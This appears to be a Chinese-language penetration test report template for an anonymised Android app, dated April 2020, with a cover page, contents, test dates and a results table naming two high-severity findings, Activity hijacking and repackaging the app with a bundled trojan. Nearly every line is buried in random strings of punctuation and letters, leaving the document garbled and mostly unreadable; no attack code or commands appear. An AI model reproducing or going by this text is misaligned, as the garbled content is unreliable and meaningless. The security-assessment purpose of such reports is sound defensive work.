l6 x" \5 \. X& K6 x! Y5 C
% M- J; M" U( q4 K2 G& X
! P1 b# [4 ]. K; G; p0 V
# p+ @4 r! G0 i8 X0 |' _
: M2 O" w4 x' a3 F6 ]( m A
% ^9 j' v$ R% w' d/ Y8 K3 o4 e, k1 _
4 ^- Z$ `+ u9 J$ m
; b9 V0 k# ~, A l+ V/ b5 E
5 [ V# ?7 _1 Y5 a; u* h
' P/ d: k# A6 F$ P# z9 v4 }
& G: ]: J/ N J! j0 P1 Y
2 b n: w1 v# Z' M! V) e5 m 文档编号:
! g6 M8 T) g q+ [
/ A. I% {+ O: d) O& J
" i& Q) s& r: @) R. d$ G
1 [$ W* ?2 H r& B' w; l0 h
/ u. R" x( d8 b) s$ |8 }8 ] d1 Y
9 ^& l7 a& Q% C2 H' f
4 L1 X4 R8 s/ k% a" e% F# q/ ~; U0 o" _# V( Z) R( ]
0 I' J* l, \2 h& Q; @; F- N" n2 _7 ?; |! `
9 p7 ^+ d8 w" a, E% t
0 O$ a+ Z8 P6 r6 M
7 i& K" |" p0 W. j( J2 Q1 \$ q/ V
; Q9 v/ ]5 S- K8 c+ J! m1 {$ ]$ t8 R3 D+ O( L9 B R, \' z1 M, y9 p: i
0 S/ \9 R7 p# \' `, h
0 p l. g& L, V
! v8 [" H: }# J& h
& V* j4 r$ r9 ?. F1 Y! B
7 A% h; H4 K- \1 J7 e! T
$ A0 F% R9 d# O# H. A3 ~5 L, g9 @
3 I+ C# ]% z3 D j: o t
1 K* k+ q' J( k8 o! f2 [ 3 D' G+ J/ L/ ?- ?+ ?; q
; K4 M& g& t2 v& o! L: Z- O
3 G% T6 I% m K6 P1 b
! X- D9 O, p" x, r7 j3 N 7 \+ p4 g$ r& \" B4 J
# M, _* ~/ i" P3 V- L1 l
4 @) X3 T5 j$ E2 z3 B' h/ g
+ f6 _7 O0 c$ s: Q0 l9 ?7 o
5 U% O3 m: |2 W3 h9 t! r0 Z; }
" ?! P' G5 r( g9 \' W3 g0 G
6 }5 i, `, L% z# x
( z9 F0 d, S( l% l- M, | 某某某APP渗透测试
4 e9 R, l+ W5 E0 ?
- R4 R/ x! |8 W) q s! h7 P2 x6 O
4 ~ J6 u5 k+ _! d( ]
+ C1 W8 P% O+ J/ d' L& J
, b; o; o' T# \1 c% @% ^# j- v$ K
4 E0 q( R y' l3 G f' i0 _ 8 T0 }- A9 b1 f; E
' d7 o4 L: j* e: v K
- }0 \; q# R0 V8 K; @8 V
( F6 \; T# e5 o
8 ^2 R- q. ?* c0 s8 T( A
4 t+ d, q+ L8 [1 K" w0 [! L1 t2 m7 F
0 a2 x8 G; w2 u3 ?9 p3 P$ v8 e$ q" b! z5 }. j+ c3 B
) M: X& B9 _7 K/ H. X
' s" W" F3 O3 O3 V$ G4 @
3 H0 W) x F$ O5 `: ~3 i( S9 w) n5 S# P3 k6 |7 i
4 |9 ], r$ n7 w! c" r% \1 T
3 ?$ k6 P; r8 J. |: y2 ^" Y/ c' P4 b
" A) t& E. X' f. r: ~; r+ |6 g! _. X, c: ^, g* X& ~
+ E5 _2 d9 t# W/ t; @& {6 _
# f. O4 M, E4 P
. H4 f! \3 k: ]8 }
, S% `% E& E, s% c" Y
2 s1 q! y- I: {, l
. H. a U; E9 o- F9 D , P* `+ o0 X$ s0 Z
3 W: K+ |& J" Y1 d7 E5 F7 \ 技 术 报 告
- C8 ]; r3 q" H2 B: v& J: X3 C" U; x0 ^% ~$ w$ R
3 g- S6 D3 p% w' k E% A0 K
i1 j, L% |) u2 h4 {
& J, @; h8 X7 ^. i, F
; Z8 R$ b) `0 Q 6 L2 H, N% [* d3 d2 b. s& g
' j( ~9 B( v! i0 G6 D! q
9 K$ E' G# S# @; Q) r3 Y, q, e8 Y/ e9 v/ k" o2 s
, g: {5 H. i! F8 k9 k$ a' Z2 \& A& P5 K6 i- Q( ^. \# U4 n
7 Y) I9 v$ J2 E5 T/ E( t5 S
1 P2 r+ r9 q' |- r- m( d6 C
6 l' z9 ?6 K/ Q% b' i5 L% ]
& L, r' _% j. N. e& S+ {( r/ k+ R6 o
5 n$ p. q3 P% s& y- p5 n/ x; Q
: c& [0 w$ O: n C* }6 k9 X. t; X) _
# q( a( g E/ ?) F
- b M4 z z/ k. V
+ l) y! V, m h# I7 q0 [& D. g+ V# ?! A$ }
' G2 O) u( m! F8 p5 {+ {
0 V" t0 a+ G' j( W @0 S' R& Q
* T+ e7 T$ h0 n9 Q; E# H8 R
# a/ ~/ k8 H- `: t& t4 q* Z
" J% b1 ~1 Z3 ?/ B- F6 L% O) _ P5 m- b: m0 M6 m& A
& K/ m) R' T% t. W/ e! Y- D" `
* d3 d' E7 p1 i) H% x# b 2 _ u/ C, w5 w# d! t" I, D( T
3 D) D" y. N" E+ ]
1 D1 Q4 M# H. U N$ M" ~- U5 S. x5 p1 _* B: u; E( M1 k
0 b' U1 r1 [7 j) L* v% H& O. o3 I# m( g; m
; e- p" o1 Z" ^( Q- n) N8 n: n& Z' m
8 r* I& \/ o3 n- h" s
; @$ P* u# W% [
3 @0 w, }% k% D! l4 l+ Q1 g* i( t: Z6 ^$ e& R0 J5 X: z
7 R: ~; _" l' n/ }. Y d: r6 }- |* D5 _ p! p4 o4 Y' K9 z
7 N4 L7 M7 w: U0 P `+ d9 J2 w
- N; n# F% ?8 `/ s" Q m8 ~1 w; p/ H0 J$ z! U7 d
# M& r- u% T- F
. F% ^! T4 t8 P) _) h2 S
+ G H& \2 R- e, z1 {
' ~3 V3 s3 _3 p" T5 W/ t3 z9 j9 v# N/ `
1 S8 X- O; V" W2 Z ]
/ O0 v- S: i* H! T: o" }$ W' X
; j- O2 |4 {* _) c2 [
7 j& _: V% Q( H0 g( V! w
Q8 c- J' C% }1 p3 M- Q# \
4 o8 [1 j/ G3 P/ R% ~ O+ A
p( y1 u* A& n/ X0 K
- F) S1 @7 U, K3 r
& ^! y' L3 z0 u% ~# x( p
! s; X* F! c5 M+ u/ g4 t- k g
: T) z% F' Q; ?, p3 g, ~) c; x; W
" l4 P+ g- W$ Z8 F& Z: d9 } 8 C4 u- m4 a6 u# d
" _) N. x5 i8 a- _* _" B
! D Z/ v3 r" o, l. @1 y$ ~4 R9 Z
' K/ X- s; ]' H" [/ @3 Z
; ~; A# {$ ]! b' C* |
) V) ~" y8 }' [0 c5 Z
- p3 ]- y2 i. L! A# o) J2 B( \8 D
0 T7 j/ L) S$ o) W3 x
# I* x- N: L& s# J9 w$ g. y, Y7 v" f0 D( V" `$ _1 r
% P. L3 r( t* ^/ c% C: a# U6 \
1 V; v6 ]' p2 ~% }$ X: y
2 N4 y% L& ?4 P& G# P' u& Y& J) x2 M- S( o: z4 L1 _2 u
, t' z6 \" @* [0 L. K# \/ D& k2 z4 z! K! j
+ R% X) q6 V8 ~7 c
1 u' }, G+ G: B$ e* ^
5 S1 h& r6 S+ I' B, [0 F
+ {7 _) j3 |; U 7 I5 k- e0 L, h2 e+ N# X
/ f" F |2 }* H' w; h- c
0 a, ?, n" v* W" H# O& i
: m' D! F, G" h
9 `7 p! ?9 m% A5 x! x* K9 g$ i3 Q, Y: n3 w$ a5 F6 D$ t
9 A3 y; d' x' m* o; J) |
$ F. K; C# Y* p& \
' h. D0 m( ~* I$ i
) }+ h% ^3 ?7 K5 ?& z& p
o0 Q1 j/ C2 N& ?0 H5 w( r+ }, z: O$ [: \" q/ U3 w' V8 ?8 z3 a# Q
. p! E% P4 m1 h. H: c% s: ~: Z
( D2 P: _+ f( T' `+ M, V5 C
* S* u! R2 j" |5 X/ p8 X
! D* v' K+ Q0 D1 b. c
* T+ G: B( q0 e1 n: a5 x* w& |
: {0 E; N, P! G a4 x7 ~! M4 q
3 B4 L* {; W# {- U/ \
) _6 B. N9 U- I2 T& k) h- D
& p6 Z7 T/ t, z* u: C( f) m* Y! K
) `4 g" ]2 b. @; P" g2 J+ F$ y
- O, ?* y, H0 d# \; B" x* I* C) r/ u/ @" \9 Q
3 q$ D N8 U! H) A# s( H' G, R- n
2 T9 \( n- q. ^7 A0 h& ^/ q: h
5 ^7 k$ v7 Q5 W' t% H
! `. {6 D5 q& M- D 3 U5 c, Y4 j/ _4 {" z
, o% n, o9 Z, L; g7 t1 f0 G' a$ H0 n 二〇二〇年 " ` h( u; M& K7 `1 U
- ~6 ^7 w7 Z5 _7 D$ W' g3 U
* [! Z/ ?5 R) Z) l- k
$ ?! V6 r8 Z, L( { 6 V- j/ Z' t; k: C/ v2 `( ^
) l* q; |. ]( C) A0 B# N% g( s) W, Q
+ T5 ?( p, K3 } N1 X0 J
p* _5 n; B- C& U, e+ q : w4 C: z$ ?2 z( H. W
- l! T: w+ N w, O) j
$ m L0 M2 x. K, l) M1 M5 K% N$ T2 A5 \2 e
2 k7 B% k ~! G% R
6 N% F) ^/ E5 v8 O7 w$ C( z
1 Y' x; J. r# u0 `0 w9 c$ e
2 m1 c9 ]: H. d; J4 @5 m
g0 N# o: a6 R3 b$ d, p
2 U$ C6 L, x5 o6 M" H& B1 _! u% f" l 3 i [/ ]# Q& Y( e3 S
: v% a) d; y$ d1 C/ g
! s% }- g8 M0 |% e& q* R* T3 C' X6 [1 h1 G4 F. \
目 录
" N" L. f* s! N5 n+ _- Y* G7 G5 n& x( X8 ~" E- c( k) `, U
Q( L) q/ O$ `( s3 g
2 n+ P, r' j) \ + F! n, s' |3 k7 D. J1 @
4 x6 n6 @8 o7 O3 K9 v
5 }6 G0 o6 l7 S- j6 C B7 c* s" Y
) x; G! Q; H) _8 T* V; L
. [9 o0 Y" G- A! \$ Q% N3 w; K- u. e! U* r% p: H$ n) p
( v9 u9 T* l) L- m7 _
3 U4 {- o6 U' z9 p& m8 v, s1 Q2 e. r
2 v# U0 j& L7 ~! O F- W O, c% [8 I$ x9 T
1 概述... 3
$ _$ W0 f8 C* q B
: A: }% z* J) S+ i* `( ]
2 e( c. s% X! H b) _! w8 r
. d; Y7 x+ M% c) d# r, }* ~ , v! K, n) B; a* N3 D: y1 o
" y0 V; j0 D" Y+ U 1.2测试时间... 3 ! G! e( v# ^7 _% h6 H
" R2 U5 X% ~; ?! Y9 N
$ R' A! h7 V. y( G4 D4 x/ k
L* B; j2 ^" |% S& F8 s 2 a6 Z% f6 o) N" d" F
) \! K1 u: C6 Z0 r 1.3测试对象... 3
4 H( f9 k+ z' L+ d8 [' A) d* T. {. L
* S T3 w( c O/ I4 E( j
' u) ^/ O: {; d4 r Z5 M8 q
9 }" z; ~" e& N( z, G( X
/ V/ J9 F0 S3 G$ Z
( z, g8 C: a/ |- n 1.4测试结果... 3 ) D4 E8 R2 ^$ _+ a
- F3 c, n* ]% o* U- b9 o" _5 r/ l
1 F+ e! Q# G7 Q8 I- X2 s% x( l" p$ e# b$ z$ T* |4 q+ N4 A
7 i0 i: v: C3 y
0 o* ?" c) C+ L5 D/ Y) x 2 检测结果... 4 ; ]- [- P0 Y& c) Z' \ G3 c
, S) ~6 f7 {& O% L6 B+ h
# N9 k" z5 K6 ]/ R" Y2 L; K
2 ?$ e; F* p. M: ` . n& k, l- T, I
7 }5 a O4 D1 k* z3 m: ?& |8 x6 r 2.1 某某某... 4
- j6 Z: D. j2 q, S9 x
8 m8 N7 j6 u. P& a' s8 S( v- b
7 f. p% U4 C" z* w
' ~* r& N; P q
/ s7 m; N; J* D) a( Z" x
9 v5 u ~9 }5 J( T9 l/ S2 ]
2.1.1检测目标... 4
6 m! S( j% G! h* [, c9 \( {
2 f- i; W( I( @. B
; ?2 l0 v, Y d- X
8 f) w# X( [' F# b" @ 2 e% }2 M$ ^4 m) N
! L2 E8 `$ B5 C1 A
2.1.2检测结果... 4
8 M& p; r9 c* ~: p8 H8 s$ k8 q2 D0 t
1 f' P/ e! h Y( C1 G6 x3 M- k
; k2 _" L5 M2 w6 d/ }; s5 I- O) v4 u
9 q7 k1 I2 z# J9 F3 N9 N% ]
: @& Q* Q0 Y" H3 n 2.1.2.1. 4
1 }8 X5 Z( Y* u- S @" t& A3 M. F+ c& c& m
0 R8 c" J& |$ u# r4 [- i
& v2 a S( |4 y- J
. `$ _, y; \; t- o- V. ~+ Q% f% k+ e; e* y
2.1.2.2. 6 . _& F) _" i7 @. L0 S
/ j2 s& s8 ^3 d8 \' V2 Z
3 m, x) M `; Q$ s! }! `
/ G4 `9 _, h' r5 l
7 G1 P) V5 k; a& D: a, Q; t& o! G8 [1 B3 I
- F5 o* `3 e* r# u4 A& p* U: ]# D3 {2 Y& w
; A, _ t, @( _
2 w+ O3 {+ L: y+ b$ M' `& p, C3 J/ _5 S
6 ^. B6 R. m+ m
0 j2 K& a. D/ G1 V+ _' x; P# {5 s: r |- X& e. A8 ^. F# ~3 K
9 R6 C$ X- I# q: O6 s X( e
7 F! s# [1 C$ Z" f6 o: t/ X @( T2 E# g. z% ]4 S
+ j0 d5 \" D" ]) `- Z
$ t. c! ~% E g j) B G9 p' e# y8 n4 F/ e6 s) M
1 概述 * I7 U9 i0 ~7 F
% `6 x1 V% n# b
: c* \" _- ~+ B9 V4 T
$ Z. ^. C! u; {2 V / }( v, l) {) H1 Y$ K3 L& @
, c& [! Q# `% H! o2 K0 |0 J 1.2测试时间
: u# Z- G/ K' K7 A; F0 T& M' V6 z4 I8 A! P& ^* H, g1 M
- P: c( g7 Z, O+ O( L
* `0 Q! J4 M9 C: U. D/ _ 6 h5 X4 m+ }+ l8 A3 a
9 a# Z+ H4 f! V1 S
0 g8 B% [$ G. a W& @- h( t* e5 a) @, O
# ^! {9 D8 f: n" F
! V2 t' V7 F* k" G w0 o7 v |
( C# @0 X8 Z1 ?+ f% n3 _, W' @3 ^' `5 L9 n* |7 ~
) n$ D' D+ }( i( }2 i0 b* H) ^* h% l
( E0 \) P& D1 T( I# X 渗透测试时间 2 ?4 Y4 ^8 `7 b+ v4 t
2 N! V. P- c# U- D
8 w% U! U% g! S# m$ }0 e: |
4 s% q' U" q# F& S' M, Y: z; J7 P
| 6 O' t! p0 B ~' p
; w7 C) x3 r! S7 _
5 b: _* h) O# U: S+ p/ {
- J; ~3 i6 c' s5 s7 S
|* v# k! l5 v! s4 ^: h, y
" k4 A/ N! g2 Z. z$ `5 I& T3 m | : L3 ]9 T" | H4 r+ e2 D* N
. l1 E9 N( K) C' b% Z
/ R- R. w; ]" |2 N. A$ P0 `7 S8 C( ^
起始时间
4 C7 h. a8 Y# p/ F) s% u
' T, Y' {+ y1 J" _ ( U+ D% d% R" w2 s2 h
1 D4 w2 I& M: s3 r" D0 Q1 r7 {( t |
( u3 f" e7 E7 P) O! p$ s
+ i: ^# b8 x. y& X 9 r Z8 F& s g) j% \8 r0 Y: n q3 f
- i% v0 i) q" T5 O# ~- d
/ x$ l1 q) V5 U2 V) O2 `3 T6 t5 [6 x4 _" N$ Y. Z. _
2020年4月6日
! o0 x( F: Z" s* n( d. k9 L( M- W
6 O* q0 p% n) d" B4 M. ^
2 f/ w; F: i1 d) n9 p: Y1 i
0 C$ W1 n& Q' L# l4 k1 X4 O |
) g4 q1 q3 x/ |4 W" x3 H
$ d* u- V$ A" i7 M. H
5 q: f' \1 e3 Y: @
4 x( R7 u# M- n( R $ y; g5 ~& _1 t) D
# A1 k* R3 _3 ^8 ]# q e | + T6 }% |+ j" j, u5 l5 {( s
: b6 H1 c. R' A% a0 ^# F$ y
1 K* I" o, n, D9 j( N* g& Z
) Y% ^7 o+ s; n/ h" ? 结束时间
8 _3 ?4 Y% \& T5 z: S1 j! L2 W: l( [
) L! R( R7 X" Y* D
* |0 @. A* G X& @& ~" N% M2 T% M7 X
|
* I/ ~2 B7 }& r- l; u* u
! @ P0 B+ }6 r J. [, `. N7 w
# n4 @% h) n- ]' H# w" X5 X5 j+ d6 O" y7 n/ D! l/ L
6 M% }6 s$ D k3 N
* y1 M" K+ L9 H" {$ y& d 2020年4月9日
/ [( H k9 B2 ?
* o1 r2 Y$ c$ c; |
+ u$ D! n$ `1 y5 N8 b2 H' U2 U# y: D. e8 X# z. ]! D
| 4 a- |1 L& u! q" t4 _$ Q4 W
6 m% t$ W8 k& I- o3 E* o3 A
3 K! ~' Y& c/ b0 S) ^4 p3 t" B0 X7 } V( I9 Q7 }
! t# u) h h0 |& [ }; z
7 r, n$ k t9 i) _
% D6 E6 ~" n8 V
) M5 X$ K. F2 l- G/ ? 1 S3 _* L9 a" M! Y1 B
F4 r" x5 W/ o5 I. z% c4 h 1.3测试对象 0 r: j: E z9 z8 G1 t: B# s
- U' F* y" N% X* l( X
' A1 d( K) [/ H4 ]2 s
2 K- |& ~$ y3 I5 c
( C& Y. E/ K/ i+ E# K
7 Z% A. q+ k; ?) @ 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
/ _- Z7 ^7 M( ?4 ^4 O1 Q2 q3 Z) o% y8 a: o/ I
* T% s( n- h2 T; L$ ^, |" O$ m1 M0 h5 C9 ]
; d6 S! M! O& s) r1 Y5 z- _
, s1 G9 M* } i1 m' F5 ~) w, j 表1-1 检测对象
, `1 a* S6 n9 K5 s$ k9 f$ {1 t9 C' |9 S$ H+ o
5 }" ~" w3 v4 \2 `) h& ?- [& {7 D3 t& g3 B- y
3 r* Y, t" w5 s! m6 P! m
' O: S9 r! Z7 w7 l
# |: {- ]) p0 A, a) n9 o
; c. A+ T1 `! i9 @- ?/ X : s( [! M( U) h: Z- y% P
! S6 q5 y, }) ~. c- H: H7 v
| * T k8 i% f7 T$ f- Q+ I
+ y: I. z j' G$ v0 N ; y2 ?7 a8 e' W/ c- a# g
8 y8 |# e+ K" v/ Y$ [5 E" w9 F 序号
0 K6 m7 q7 i' d6 ^* g2 w% A4 {
8 b! E+ r2 X+ L
|% _( x t5 I" f3 g* [% Z+ @+ x
# a" H* `) \4 }& L- M& B6 c | % J& [$ K, E! J% F) f
6 |5 p3 A3 V5 O. {" L0 {: G: F/ _
0 g3 J: j1 p g
2 T$ y3 m! _7 K" d& U4 e3 e
5 \& W4 P8 }& `5 m" \. A1 p# N8 v9 Z3 s9 Y' A/ {; g1 y
测试对象
6 h: Q5 y3 Q* W. e2 d x; e9 [0 D! c1 A& i0 d0 q
: r; Y, m* f4 f8 Z; L
$ ]8 ?8 t, c r" |0 U) U7 e/ n; K | $ E5 t& ~. G/ B" F, l
g1 V4 ^* ~- Y; G& U
# g' m! x6 b* ]! a
" b# b. p7 X: u7 t* L _; f+ u O
7 b7 w" A% u9 ?2 o' s$ m
% T7 x! U3 E4 I `# @ 测试地址
3 W: f! P! u0 [6 [9 W2 T( r9 E/ K, R$ X, m' p8 d n
( f! l3 a( a- G! O
, r6 a2 F3 V$ J2 _- l
|
, ]4 o: e+ I! R) G2 ]" \% W6 G; V8 `
S }- `* x. Z, ^% k- [1 J! j. l$ A2 c) o; G# U$ @9 |
! F; F! G2 W3 G2 \- s0 j/ Q
+ t* T( Q, @5 @3 |
安全漏洞 4 y3 f+ w3 |. [( d& n1 s
( U3 T# m g- @. Y1 f 1 R7 J: u% m" B6 s, M
3 N4 X3 }% A- {; x
|
6 v$ q( b( ^; O9 E
' e3 r; a4 F. o6 I8 [
3 k$ D) G3 h( k) ]' s- N* O
* m+ N( W5 [5 p% q
8 t1 h# r- l% u, C; q" i4 V j( F$ X& v, s
| ! _2 v. J s) r/ O, l/ T+ S
) _9 H& c# J: V/ m
% ~2 _0 r- d( g' q8 {
0 x: Z. L& q V1 I5 t5 | 1 " t4 u& x$ B% O" r
h; [! q7 E' y" n# W. k ! W6 j% X8 ?4 K& r& Y
5 I% A+ N/ I6 ~& w |
2 B6 o4 Z0 q4 x* {3 v y5 L2 }5 k; M/ E6 e! U. q4 K( K- c
9 A8 G: I5 B" f O) A/ \
$ T3 n8 l K% V% Q! h2 e6 b# y ( a! x" h6 P* e2 j# \8 Z
3 ^- C; @) @. {& `' x+ p% B7 A
某某某安卓APP M2 U' R" P/ z
% Z. H6 @+ | H @
. R: m5 w! v6 S4 ^" z1 D+ X& D5 Y2 F5 X5 d$ O9 \( q
| 9 w5 }9 e: O* Q! u4 \
. j q) S5 a/ D S* J/ Z9 I% [4 R + K/ [8 h: k6 J F- i
) ~8 J* T2 m# Q" v& O7 o% J8 Y" F * y1 ^# G3 m2 J# v8 E
2 {& }4 N# t. u8 n1 K6 @8 C
8 k5 Q% Z5 b, \2 Y. g
8 L7 c& q: Q* F) i8 O/ y& f 0 {& k3 \1 H$ t% @
) z9 C% a. z' U% g
|
. Q3 ?) n% j2 V: C1 x8 \. m) w$ q M1 r9 v w
8 x+ Q. f) s# A# r0 M) n
/ [- `# x0 ?2 c' q6 O & E/ z$ B) {3 e" W2 U% y$ N T
- t& _2 x Y N+ @( m
2
5 I$ u8 v; y2 C8 ^4 N. a6 k4 S h# |. R
/ j9 @5 b' P7 Z! R" U! Q% s
' c+ y8 j/ U" _5 p% q |
Y0 @0 q0 f3 P; o0 u
( s8 n/ C. u: i) c4 K
' V2 S: ?0 v7 M0 t( w. H
7 s ^. p' {5 S: P' }+ r- S
: I- b' F6 N; R9 i/ K' i
8 G# z7 w$ l) U `
( b- E- ~( y1 {& n6 Y( F' A9 c' Q
/ e7 \& K% |, `+ _# L$ N$ d' C H) U5 X. Q
1.4测试结果
/ p, u6 s2 E! F, E" e$ m$ R/ i% T% a+ F/ }# ?% Y
1 F! X* |3 {3 d7 m8 }
' V" a- j- _- O# H+ u
; @! {, a" ^" [- a
: b7 D, g& I+ T 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
0 H6 P9 s5 s1 F" G3 L4 z4 {
, n) M6 ], n! K) @7 F# s
7 g& s7 `5 n$ c/ T9 m9 r! Z
( }& T8 {; `* ? }4 G& ?8 J! x$ X1 s. V
* `! B4 S! ~+ z6 ?2 H% }* q8 U
3 ^, v" h) E7 ]. m9 v4 L1 D" B E- Q* w
# ^- s$ f3 J8 T. O, k
8 ~# l/ ]+ e7 o* X( Q
U$ o) n: v( n. d2 Q+ _1 H6 r3 s
% [4 Y5 G- @# r5 ~
- H8 O8 U; d0 M# ]8 ~% n- |- p1 i( B7 R
1 m/ H4 @ ^, R0 I6 X, r7 K4 @
f. y9 ~5 H) T) Q: X
6 Y+ Z I1 q5 t' o
; d R7 _$ B' C- {& R | 5 V7 h/ z6 R& g7 U- H
: l9 M6 Z: T, i8 t: ?
4 r) }9 r& L* c+ X$ F0 S" Q' R$ g( |7 a
序号 , _8 i1 R6 ?* N, u1 C$ W* X/ o
5 u" M2 M: g( u. r9 }# i5 `
7 {3 o0 \+ K; d4 [+ [% i; ?3 L- E2 ~2 y8 L: l
| , g0 B2 `" R, x, Q ^2 q
. J* ~/ P& I1 b6 [/ ~
" c' {$ d. u3 [8 F0 {9 m
; z" F% u1 v$ `$ Q4 F- M. d
, U W4 ]6 _9 s+ e& c6 I* c: H
8 k9 i% }/ q6 O! D- T" ~ 系统名称
4 L' m: R- J; V, s6 u* w6 O9 ]$ _ K$ p8 ^9 A
8 O! D4 K& n v6 b5 `$ d' w' \7 ^" ?' E4 l9 E3 ?* g' t
| ! O2 R8 Y \# T
3 j% H6 [4 V. T: ]& T ~1 _8 X; ~
' t4 x; e1 t& W% q7 Q, m) d, R0 H/ Z) }
, P' ?" x) c8 K7 f5 l0 K' [
7 I4 \; W& W9 T( C# D 漏洞名称 |& A& q8 O& j5 E8 R
% q# C: U8 z) R6 K4 n7 S) N n . y# s4 E( A1 d; k
0 P2 O1 v% q) m& d2 e( h4 I8 L | ) x0 `7 ]* |( }, k( r
* t- ~1 y6 H9 r) w- s# W8 U6 p 9 \! E& {; x. R2 p
' s7 K7 W) E1 r/ F
0 P- _) F7 {* n
, U* X: g) q+ X7 Y. D; K8 D
漏洞危害
2 ?* z: z% t$ h, {# g0 W. h8 p7 |4 T; Z0 D) x
6 [! Q9 J' n8 o" u- G; h, x- D! M4 s. ?" Q
| 4 `3 h1 b6 o) h( Q: ?( y3 g: j
- }9 A7 v8 v* B' A' }; p6 h$ M 1 i3 i* L: h7 J( v, P
$ a7 c! D( `# y4 f( @6 D
& F$ p/ x- {+ {8 c, j
, J; ^9 x$ x6 } 修复结果 ! o6 D& l! d. n* B& n
/ r; ~3 e! s+ K
- F8 b+ \$ w( v" w
' x" E3 c& X% N2 h( ?/ [. J |
% t* ?+ \( q/ w: ? R+ @4 O1 ]0 T3 G- _+ x! f0 U
. e% d4 R; i7 m- s7 I4 R% ~
$ o9 O! e4 v- E# b! w' _( w7 W
8 e! H9 n% U/ ^3 P
! j* H1 Y' G+ b! ` | " P2 Y) G( h& V& P! n3 m
/ ^2 K0 L3 c( Y2 a7 c
& [3 {/ I* M s9 N2 e* t- O/ K: k1 k) Y8 f6 O
1 , ^! h9 z- A6 T
; e" u- |2 h1 s, K( a/ U' Y! O8 W! r
+ d3 h, o& U7 o' i# ^) D8 l
( B2 Q% G5 ^2 ^6 S
| * D/ G1 I3 X. i8 E5 W* y
5 U g5 ]+ ^1 I {! s, N
% F; |0 K2 U. l+ ^) M1 x4 e) }9 n
7 b3 G! I- ]: \8 J ! Z7 x# P( o. j/ I; N9 H L! p, x% `
9 `0 N* g5 ^* ^* g h7 J+ z
某某某某某某APP - v& m3 |. m0 {. d" |
+ `- s4 s! ~( v9 ?. R/ W
4 m- `) w6 h. f! F+ X I9 w
: v; B. A* E1 [9 E1 [, w |
3 O# p2 a4 J* P% z3 c0 Z! Z# ? O& N9 j; [. X+ \! T5 Q; U
|2 z5 A0 y9 C2 f* U4 B
3 ^* _7 ]3 r3 s, H+ s2 |, |
, f$ L" @) k) ~& Q- t8 ~8 G- ^1 U
9 ^+ {* H' D" b) z( @2 Q' a Activity 劫持
. C2 h' }4 Y' n4 r8 I+ ]9 N( n
1 ^9 f/ g3 j: D5 P# g! }
- C# k% k3 v8 o# h; n \2 _! c
p6 M1 r& w( G. A- q
) m9 J6 d7 o! \9 N3 t& O) B5 D8 t2 Z
/ ^- ~, V7 E" ]; `8 p5 i1 l* C( ^
R# H% J* z. k5 x7 N( g
5 f+ ~ Q: W( G1 ?8 y7 U. M
7 |6 Z& l0 ]% ^( i |
5 `- o4 h) G8 m/ | S5 a( [- w( ]3 H, d: Q% l7 _" d$ ~
) z. @% b* n( a
3 G0 _; h0 Z* ^
7 S. |2 g+ u; y6 o2 P% |$ P5 E, q
高 & x, T9 C5 h: p2 Z0 a4 c* `% U b. T
( M7 f7 h6 q' u# X b9 H; C6 U
% z* {! a! v% Z4 Q
/ a& z5 ]) q5 N; F- W6 p | % S# c' d& [* Q
# g i- h5 Z G( z( K/ u: D
' p4 q' ?: \" S4 `
; b! B2 l! C' q! m3 S* N/ R
% |7 v& r6 v' u' N/ m8 D" b+ _- S/ F5 L* h; x+ h
6 k2 G6 F1 O! G- j! m
: H/ M8 B1 I2 |$ K+ C 9 j3 y4 u' S# T
* n$ y! i5 P$ y! W6 T l: R. U, H. O
|
# P; ], u& c) `6 c( @4 b# _4 u/ n' b( e3 x' F) s4 O) ~
0 Q% R* e& g& L) I" i; ^
% l" _7 l2 |# E$ H* O( L% w
! i P. f4 l2 @2 J5 j) O
' s2 Q X1 k I |
* C) P* \' @! V/ z# T: a. n, e- ]( A1 |
" w* A% f0 e1 L( s; {3 E& P* j( _+ |; Y# ]
2
( T B. a3 O" w" m& U- y: P
6 Q) I" U# M, m, k. a/ D3 u# W
" X! `. j8 C! U, m+ I8 g$ y. M4 A( H* S8 Y9 S6 H; Y
| & x/ z# |+ F! L& j L
$ |- F) k) @8 @; ^% O- {% z4 Q6 k
9 r# f. c) \5 ~) L: g% k5 |( \. }" O% Y5 u( E. \, v
* }- z9 a( d0 G) M7 L% m6 @* z$ i, S& i# V
某某某某某某APP
. f- t& s, r+ \5 |9 {. L7 N8 u1 ^4 c9 ^: l( E- Y
. u5 Z. ]- R1 O5 m0 d9 T; v* i/ V/ N- { A+ G# S
| $ t3 d6 e" A" r( }* t5 y# i) D
0 s9 L9 j+ {8 K" D6 Z
% ^' m- b( ~9 A7 y; ?3 W- ^+ `% U1 L* Y& p
) G* f; o7 k9 D1 {! U5 Q( e, b5 ?
# e/ J4 [, a2 f, a* g8 q 反编译二次打包捆绑木马、篡改APP代码
, y4 d5 T* g4 n5 P S8 C; L( I! P7 y% J8 J4 M [5 E0 `- l0 a, q
0 U$ H: c0 t5 R9 h4 Z
' {( b K+ W! z |
- D/ g7 r% f/ L: w
8 ~% K, h; D/ @* j6 @ x
) S6 r; c. @/ `( |. y8 Y: r. ~5 t" [8 [1 n6 s
% O4 @0 A8 i2 ?$ g' d. i9 c% }7 K1 f: Q* ^! D: G2 q( u& ]5 m
高
2 }" P4 U. l8 W% _" k: g9 O$ y; w
& Y" A1 e k3 c' Z7 \9 s
" w5 U7 ]( N$ f | / F' R; ?5 O [; R7 p7 T/ S
2 Z1 m0 r. J) T' f+ Q
) I& R+ |! _# Q3 Q$ Y. |! i$ z
1 J: w6 H2 q! f1 z1 m; @* Q0 L
( M% V$ R: v0 J5 d. z6 I" A" u1 v
0 M! ~6 z+ _, K( ~- Y
4 E) R5 c- e+ }; Y( b
( p! @' Z0 |4 g0 H* u
5 R4 m2 P9 t( |5 `3 w# @. c | 0 P6 F% Q! _( m2 y/ g
5 J6 M& b! }( P. w* v6 C
7 z: P9 ?# G% ~/ r* R2 N3 d8 I3 n- R
3 K: b @( x5 S1 C
6 K; l. ]$ m9 n
: W9 P# X: e- i0 P1 A0 ^, D3 s0 ^% e6 V/ W# v
3 Y$ Y- t- h2 D d) p+ b2 ]5 r, z$ y
0 C: }$ e8 q s" l0 T% v7 [0 A9 c d4 w* |- J, a. N$ U4 o
" E( a; V1 }- H5 o
8 O! S0 U) V- `
8 A+ i6 V* L7 B! S( D9 A; T/ m6 F+ P
+ F; N. E! @3 W0 D; W; m
, ], K }3 m9 E4 P# ]2 @
